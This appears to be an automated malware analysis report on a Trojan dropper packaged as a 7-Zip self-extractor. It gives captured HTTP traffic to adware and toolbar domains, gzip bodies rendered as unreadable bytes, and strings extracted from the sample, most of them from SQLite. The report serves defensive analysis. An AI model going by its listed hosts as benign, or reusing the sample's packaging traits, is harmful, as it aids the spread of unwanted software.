Set-Cookie: homePageOption=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: homePage=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: countryCode=UA; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: cakeId=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: campaign=orgyyy; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: cobrand=BNH; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: anx="xracl=&xckoid=&xgds=&lv=1480701874784&xad=&xmvte=&xit=&xlang=&xmvtv=&xmvtt=&xckid=&xrm=&xrp=&xrs=&xrt=&xnt=&xriad=&xft=&nv=1&fv=1480701874784&xuer=&ob=-&oc=-&od=free.mytransitguide.com&xgc=&sn=dubprdsndlbfe17.dub.jabodo.com&ok=-&om=referral&xrkw=&xrco=&xrca=&op=index.jhtml&xrcc=&os=-&surveyUrl=&xkw=&g=-&xct=&xiad=&xbkw=&tbGuid=&xg=&xh=&xi=&xtp=&xn=&xp=&xtt=&xpp=&xs=&xt=&xu=&xcid="; Version=1; Domain=.myway.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:34 GMT; Path=/

Via: 1.1 VVV.mapsgalaxy.com

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Set-Cookie: ltm-1d=rd119o00000000000000000000ffff0a904c19o80; expires=Sat, 03-Dec-2016 18:04:32 GMT; path=/
a..............53..-.A..0...Rr.....im.B.....W..0...>4s..2.....I...w
.3..<.a.&....TqP.....]..x.7...KX.....0..<<< skipped >>>

GET /prd/ttdetect.html?&op=g&cobrand=BNH&xdm_e=http://free.mytransitguide.com&xdm_c=default7926&xdm_p=1 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ttdetect.staticimgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 17 Aug 2016 14:30:23 GMT

ETag: "3f18a8-6b15-53a454e3f7ab3"

Accept-Ranges: bytes

Content-Type: text/html; charset=ISO-8859-1

Vary: Accept-Encoding

Content-Encoding: gzip

Cache-Control: max-age=24897536

Expires: Sat, 16 Sep 2017 22:03:30 GMT

Date: Fri, 02 Dec 2016 18:04:34 GMT

Content-Length: 10125

Connection: keep-alive
...........}iw.....w.....d.M...T...Mzb''v.{  Y.@..$*$.!..o.{c A.r...z.
Z....{............Uc...O.....^.?3.{..7.......i..<....y..C~K..$J....
t.EG.....~. ..y#.[@.9..;...'s...h9..8.[.."..7.<....uA..<...(I-..
A.|...........|>.'O...1.%..Oy.L..oS..`..^.....4^z9..........s/.l*.O
`m..!..v.og../.[........?9..>...C.[Ct..............N........(..P?..
.3}.,.L.-.v ..qf....<.....i8.../...i. .v.....W.N..2..f...O..e#..T.9
,..y..).^'q(.B..P'..<$.I.K.{~..K....t.}...];../t= .......D.C;..S(kg
.8........]r...^....*"V .\..:..G.7..........=X[.7...<.....z.n......
h}8.|8zp..;c:f.....?..x.l4<{.at....^.Gq.>I.......@4.7]........|.
..8..P.,.....k..4.O...._{...g7p..._O...._.8^..]....=./|...u..[.E.....3
..T.9....N.U.Y....t....2EA.5..8a...b{..\..v..\|Y.,.1..hC*^.5.....3XC..
.9P?.)!..Av..b*...M....U......ko...P...KM.Q{.eW..r.^_......x.iNF..g.Rm
. 0..rq..f...dZ._.;...;.RY.DUk.9..q....0.z........s..j..hy.....W.)...H
e..~...<A."#W.....,..2.....e...5.........q.'..,.P.;...7.......[....
......v....w....f..;?.......l..!aCj. .p........8.....s....V.`.........
;Z.{Gt2.q..M...}...lz......9@.].,....S....m......@v.u........=..w.n...
...f..=W.....|..'.qB...t..B\.....ZKl.Z........ e{.,,......5N(!6M\..iw@
Z..Cl..z........g..2h.1..|..M..!...@..g...4$.a.c...!....n...0X..L....-
=u.6.%\.S..)....Rn|.|.z#.S...Z..o......E.lU..K........}m...ve...$I..s.
..v.....0^.T.6.....d>......I.#..F.T........8?.C..0...#l.6.$...9.v..
.Za(2e.r5.........:...)..z..j...yH(.].).......I.H%.I......d7T...."V...
.......=_r...GD9.,...4..g.....v..L@.L...\..e...\&..e.I....a..<.<<< skipped >>>

GET /index.jhtml HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://bus.ad-jump.com/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Host: free.mytransitguide.com


HTTP/1.1 200 OK

Date: Fri, 02 Dec 2016 18:04:32 GMT

Server: Apache-Coyote/1.1

P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'

Expires: -1

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Cache-Control: post-check=0, pre-check=0

Content-Encoding: gzip

Vary: Accept-Encoding

Content-Type: text/html;charset=UTF-8

Content-Language: en-UA

Set-Cookie: userSegment=""; Domain=.mytransitguide.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Set-Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; Version=1; Domain=.mytransitguide.com; Path=/

Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_UA; Path=/

Set-Cookie: anx="xracl=&xckoid=&xgds=&lv=1480701872700&xad=&xmvte=&xit=&xlang=en&xmvtv=&xmvtt=&xckid=&xrm=&xrp=^BNH^orgyyy^S18590^ua&xrs=&xrt=S18590&xnt=&xriad=&xft=&nv=1&fv=1480701872700&xuer=1&ob=-&oc=-&od=bus.ad-jump.com&xgc=false&sn=dubprdsndlbfe47.dub.jabodo.com&ok=-&om=referral&xrkw=&xrco=BNH&xrca=orgyyy&op=-&xrcc=ua&os=-&surveyUrl=&xkw=&g=-&xct=&xiad=&xbkw=&tbGuid=75357AF2-6820-49C9-86BD-ECF27652C299&xg=&xh=8681&xi=MSNI&xtp=vhigh&xn=&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xu=&xcid=3121b0a55fdb4060b313a5cb88f90289"; Version=1; Domain=.mytransitguide.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:32 GMT; Path=/

Via: 1.1 VVV.mapsgalaxy.com

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Set-Cookie: ltm-1d=rd119o00000000000000000000ffff0a904c37o80; expires=Sat, 03-Dec-2016 18:04:30 GMT; path=/
1a9a.............}kw.8.......`8.....$..fg.?.}..}c..g...%R6.IT.........
@..Yv......$"P(...B.(.....g............=...L&........~..(....L...?....
?..w/..w..v.o]...u......e/.-......w.g.....#..lYg.7N.4...pii..m.Wi:.ZZ.
..i.,7..r....-.jca.s1.J6..........p..%x....\........]......p.[....-..J
.W.?...c..8H,. F.$y......FA.YX.b..4.v..h...t..n..V..\;.n.%$a.._yq.....
....Z....F9.F.k{..*.54o..d....CH..~.^... .....$....O...I?.'.9...Ajyq4.
......;jj.%!.... .7M..V8.D.}"'.dV86~..4./....(.*....A..D.MV.8.N.!*..Y7
...z..."....5B.:.#C....j.BA_..}dhrB.(...rK........w.GV..#...w.qj...j'.
.........w.\... .|..l....j...b L......./.4...d.S.' :M....xP.........b.
.:......&.6..9.W.O...&.w.$.72l7..*d...t..4...K...<.T`.O.....^r%.p[.
.........GC.SoX_..5....6....4..._.8..vh..r......}z..?.@OS=.......(]@..
q....^o...?.....{i...4..[...B..QO.zM..........N.i..H..p........A.*...x
w..X......3...M.Z.n.7.[...|e....k..I...6....4. ...........[P.$.I.w@..u
@ |..R{]..".af.L.^?./}|.....j;.1.A-@F....1..4.z...g'M......%N0..>..
A...[.m.=.a^.$E....1... ...w.1..m...NZ.f.K.oX....\.. S......e.....L.(Z
..>..S[....7....2........,.|....R3...m......Z.-Q&.W<O........cae
...V.v. ...tz../.#.N.....l..E.a....I.o.....[...`._l................J..
.`......j^.]L........sB..M%..!...jL.5....5...@...]....Z...{....>7j.
..:.Q~.C.......$#...&.....|......@.3.G...YkQ}..A.iU....b.$..Q..S_.....
....j;...0.8S...f.x...v.. .$.....d[4......y..&..e8.;.2...f..........V.
.do./..-......!%...9a. .8v.wF......}=.. ...h....A>q8..G?....._f.}..
.....w....4>.....B..a...H....h.>.`..`U.Q.....`.A."0...fl.Ls.<<< skipped >>>

GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872700&anxrd=bus.ad-jump.com&anxrk=-&anxrm=referral&anxrb=-&anxrc=-&anxrs=-&anxsq=1&anxi=F3E6638C-ED5D-4BD2-9768-0AC49325CE9F&anxe=backFill&anxr=903713179 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: free.mytransitguide.com

Connection: Keep-Alive

Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355
HTTP/1.1 204 No Content

Date: Fri, 02 Dec 2016 18:04:34 GMT

Server: Apache-Coyote/1.1

Via: 1.1 VVV.mapsgalaxy.com

Content-Length: 0

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive
....


GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/index.jhtml&anxl=en-US&anxlv=1480701872755&anxsq=3&present=false&anxe=ToolbarDetect&anxr=1137261564 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: free.mytransitguide.com

Connection: Keep-Alive

Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701872936&nv=3&t=-&v=-&p=-&si=-&s
HTTP/1.1 204 No Content

Date: Fri, 02 Dec 2016 18:04:34 GMT

Server: Apache-Coyote/1.1

Via: 1.1 VVV.mapsgalaxy.com

Content-Length: 0

Keep-Alive: timeout=5, max=98

Connection: Keep-Alive
HTTP/1.1 204 No Content..Date: Fri, 02 Dec 2016 18:04:34 GMT..Server: 
Apache-Coyote/1.1..Via: 1.1 VVV.mapsgalaxy.com..Content-Length: 0..Kee
p-Alive: timeout=5, max=98..Connection: Keep-Alive......


GET /anemone.jhtml?anxuu=355A1458-B606-4CD6-A42E-AB2595CB700B&anxa=CAPDownloadProcess&anxv=1.0.0&anxd=2011-06-01T04:00:00Z&anxsn=dubprdsndlbfe47.dub.jabodo.com&anxu=http://free.mytransitguide.com/installError.jhtml&anxl=en-US&anxlv=1480701874788&anxrd=free.mytransitguide.com&anxrp=index.jhtml&anxrk=-&anxrm=-&anxrb=-&anxrc=-&anxrs=-&anxsq=2&errorCode=blockedCountry&errorType=browser&anxe=installErrorLanding&anxr=152677283 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/installError.jhtml?errorType=browser&errorCode=blockedCountry

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: free.mytransitguide.com

Connection: Keep-Alive

Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3lt
HTTP/1.1 204 No Content

Date: Fri, 02 Dec 2016 18:04:34 GMT

Server: Apache-Coyote/1.1

Via: 1.1 VVV.mapsgalaxy.com

Content-Length: 0

Keep-Alive: timeout=5, max=97

Connection: Keep-Alive

HTTP/1.1 204 No Content..Date: Fri, 02 Dec 2016 18:04:34 GMT..Server: 
Apache-Coyote/1.1..Via: 1.1 VVV.mapsgalaxy.com..Content-Length: 0..Kee
p-Alive: timeout=5, max=97..Connection: Keep-Alive..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2948:

!Require Windows

.text

`.rdata

@.data

.rsrc

<x%u<

ttNt_Nt.Nt

BvL@Cv}.Bv

:Language:%u!

Sorry, this program requires Microsoft Windows 2000 or later.

COMCTL32.dll

KERNEL32.dll

GetKeyState

USER32.dll

GDI32.dll

ShellExecuteW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

MSVCRT.dll

_acmdln

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="7-Zip.SfxMod" processorArchitecture="x86" version="1.4.1.2100" type="win32"></assemblyIdentity><description>Enhanced SFX for 7-Zip</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application><ms_compatibility:compatibility xmlns:ms_compatibility="urn:schemas-microsoft-com:compatibility.v1" xmlns="urn:schemas-microsoft-com:compatibility.v1"><ms_compatibility:application xmlns:ms_compatibility="urn:schemas-microsoft-com:compatibility.v1"><ms_compatibility:supportedOS xmlns:ms_compatibility="urn:schemas-microsoft-com:compatibility.v1" Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></ms_compatibility:supportedOS><ms_compatibility:supportedOS xmlns:ms_compatibility="urn:schemas-microsoft-com:compatibility.v1" Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></ms_compatibility:supportedOS></ms_compatibility:application></ms_compatibility:compatibility></assembly>

X%cX%c

7zSfxString%d

0xx

"%s".

Could not overwrite file "%s".

Could not create file "%s".

0xX.

7-Zip: Internal error, code 0xX.

7-Zip: Internal error, code %u.

7-Zip: Unsupported method.

Error during execution "%s".

"setup.exe".

Could not find "setup.exe".

Could not find command for "%s".

) "%s".

Could not delete file or folder "%s".

Could not create folder "%s".

Error in line %d of configuration data:

Could not open archive file "%s".

1.4.1 [x86] build 2100 (2011-04-28)

9.20 (2010-12-18)

Supported methods and filters:

@7zSfxFolderd

7ZSfxx.cmd

setup.exe

7ZipSfx.x

@ (%u%s)

dllhost.exe_2044:

.text

`.rdata

@.data

.vmp0

.vmp1

.rsrc

3hd%S

3hr%S

3hy%S

3h~%S

f9z.vk

__MSVCRT_HEAP_SELECT

user32.dll

GDI32.dll

WINMM.dll

@.reloc

.FGy#

8_Eu.QP

 ] ;_ }9

.6.78.9:;

B.CDEFGH

large file support is disabled

unknown operation

SQL logic error or missing database

rekey

hexrekey

hexkey

foreign_keys

foreign_key_list

foreign_key_check

defer_foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_crypt

sqlite_log

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat4

sqlite_stat3

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

FOREIGN KEY

GetProcessHeap

RowKey

3.9.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

@failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

Adelayed %dms for lock/sharing conflict at line %d

sqlite_user

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

SQLITE_

os_win.c:%d: (%lu) %s(%s) - %s

%s%c%s

%s(%d)

FOREIGN KEY constraint failed

%s prohibited in %s

%r %s BY term out of range - should be between 1 and %d

Expression tree is too large (maximum depth %d)

too many SQL variables

variable number must be between ?1 and ?%d

too many columns in %s

%s OR name=%Q

type='trigger' AND (%s)

table %s may not be altered

sqlite_

%s cannot use variables

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

duplicate column name: %s

too many columns on %s

DELETE FROM %Q.%s WHERE %s=%Q

sqlite_stat%d

cannot modify %s because it is a view

table %s may not be modified

foreign key mismatch - "%w" referencing "%w"

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

table %s: xBestIndex returned an invalid plan

no such vfs: %s

%s mode not allowed: %s

no such %s mode: %s

FROM '%q'.'%q%s' AS x

,%s(x.'c%d%q')

,%s(?)

unknown tokenizer: %s

unrecognized matchinfo request: %c

>reserved fts5 column name: %s

unrecognized column option: %s

unindexed

-near %d

-col {%d

-col %d

, %d)

%s%s%z%s

no such tokenizer: %s

hex literal too big: %s

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

foreign key on %s should reference only one column of table %T

a JOIN clause is required before %s

duplicate WITH table name: %s

error during initialization: %s

no entry point [%s] in shared library [%s]

sqlite3_

unable to open shared library [%s]

%s.%s

sqlite3_extension_init

USE TEMP B-TREE FOR %s

COMPOUND SUBQUERIES %d AND %d %s(%s)

%s:%d

recursive reference in a subquery: %s

multiple recursive references: %s

table %s has %d values for %d columns

circular reference: %s

multiple references to recursive table: %s

SCAN TABLE %s%s%s

vtable constructor did not declare schema: %s

vtable constructor failed: %s

vtable constructor called recursively: %s

no such module: %s

%s.xBestIndex() malfunction

prefix length out of range: %d

%s-shm

unable to use function %s in the requested context

CREATE TABLE %Q.%s(%s)

%s %T cannot reference objects in database %s

sqlite_master

sqlite_temp_master

default value of column [%s] is not constant

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

%s.rowid

no such collation sequence: %s

cannot join using column %s - column not present in both tables

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

column%d

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

too many arguments on %s() - max %d

json_%s() needs an odd number of arguments

parse error in rank function: %s

%s: %s

%s: %s.%s

%s: %s.%s.%s

misuse of aliased aggregate %s

not authorized to use function: %s

the "." operator

too many terms in %s BY clause

%.*s"%w"%s

%s%.*s"%w"

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

Cannot add a PRIMARY KEY column

automatic extension loading failed: %s

illegal first argument to %s

%s {%s}

d-d-d d:d:d

d:d:d

d-d-d

view %s is circularly defined

recursive aggregate queries not supported

LIMIT clause should come after %s not before

ORDER BY clause should come after %s not before

zeroblob(%d)

sqlite3_get_table() called with two or more incompatible queries

ANY(%s)

VIRTUAL TABLE INDEX %d:%s

USING INTEGER PRIMARY KEY (rowid%s?)

INDEX %s

COVERING INDEX %s

PRIMARY KEY

AS %s

TABLE %s

SUBQUERY %d

, T.c%d

%Q.'%q_%s'

parse error in "%s"

reserved fts5 table name: %s

no such column: %s

{%ssegid=%d h=%d pgno=%d}

{id=%d leaves=%d..%d}

{lvl=%d nMerge=%d nSeg=%d

%d(%lld)

porter

?API call with %s database connection pointer

cannot limit WAL size: %s

2nd reference to page %d

invalid page number %d

automatic index on %s(%s)

database corruption at line %d of [%.10s]

recovered %d frames from WAL file %s

bind on a busy prepared statement: [%s]

%z - %s

malformed database schema (%s)

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

freelist leaf count too big on page %d

recovered %d pages from %s

unknown database: %s

Fragmentation of %d bytes reported as %d on page %d

Multiple uses for byte %u of page %d

Offset %d out of range %d..%d

On page %d at right child:

On tree page %d cell %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

Page %d:

Pointer map page %d is referenced

Page %d is never used

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

at most %d tables in a join

unknown database %s

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

MJ delete: %s

-mjX9X

MJ collide: %s

%s-mjXXXXXX9XXz

database %s is locked

cannot detach database %s

no such database: %s

database schema is locked: %s

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0

PRAGMA vacuum_db.synchronous=OFF

cannot VACUUM - SQL statements in progress

SELECT %s WHERE rowid = ?

INSERT INTO %Q.'%q_content' VALUES(%s)

SELECT %s WHERE rowid=?

SELECT %s FROM %s AS T

REPLACE INTO %Q.'%q_content' VALUES(%s)

SELECT %s FROM %s T WHERE T.%Q=?

SELECT %s FROM %s T WHERE T.%Q <= ? AND T.%Q >= ? ORDER BY T.%Q DESC

SELECT %s FROM %s T WHERE T.%Q >= ? AND T.%Q <= ? ORDER BY T.%Q ASC

CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);

CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);

